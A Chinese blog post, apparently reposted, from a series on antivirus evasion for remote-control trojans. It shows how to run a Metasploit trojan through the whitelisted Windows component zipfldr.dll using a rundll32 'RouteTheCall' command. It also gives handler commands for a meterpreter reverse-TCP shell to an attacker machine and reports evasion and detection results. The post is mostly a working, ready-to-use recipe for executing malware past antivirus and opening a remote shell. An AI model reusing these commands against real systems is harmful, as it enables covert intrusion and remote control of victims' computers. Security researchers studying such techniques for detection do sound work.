远控免杀专题(56)-白名单zipfldr.dll执行payload

gclome

原文链接：远控免杀专题(56)-白名单zipfldr.dll执行payload



一、zipfldr.dll简介

zipfldr.dll自Windows xp开始自带的zip文件压缩/解压工具组件。

说明：zipfldr.dll所在路径已被系统添加PATH环境变量中，因此，zipfldr.dll命令可识别，但由于为dll文件，需调用rundll32.exe来执行。Windows 2003 默认位置：

C:\Windows\System32\zipfldr.dll
C:\Windows\SysWOW64\zipfldr.dll

win7位置为：
C:\Windows\System32\zipfldr.dll
C:\Windows\SysWOW64\zipfldr.dll

二、使用zipfldr.dll执行payload

攻击机：10.211.55.10 kali

靶机：10.211.55.18 win7

由AVIator生成msf.exe。具体参考远控免杀专题(14)-AVIator(VT免杀率25/69)

将生成的msf.exe木马移动到靶机上。

metasploit监听

1. use exploit/multi/handler
   
2. set payload windows/meterpreter/reverse_tcp
   
3. set lhost 10.211.55.10
   
4. run

复制代码

靶机执行

1. rundll32.exe zipfldr.dll,RouteTheCall msf.exe

复制代码

360提示恶意命令执行。点击允许后可上线

放在virustotal.com上msf.exe查杀率为19/69

三、参考资料

基于白名单zipfldr.dll执行payload:https://micro8.github.io/Micro8- ... 85%AB%E5%AD%A3.html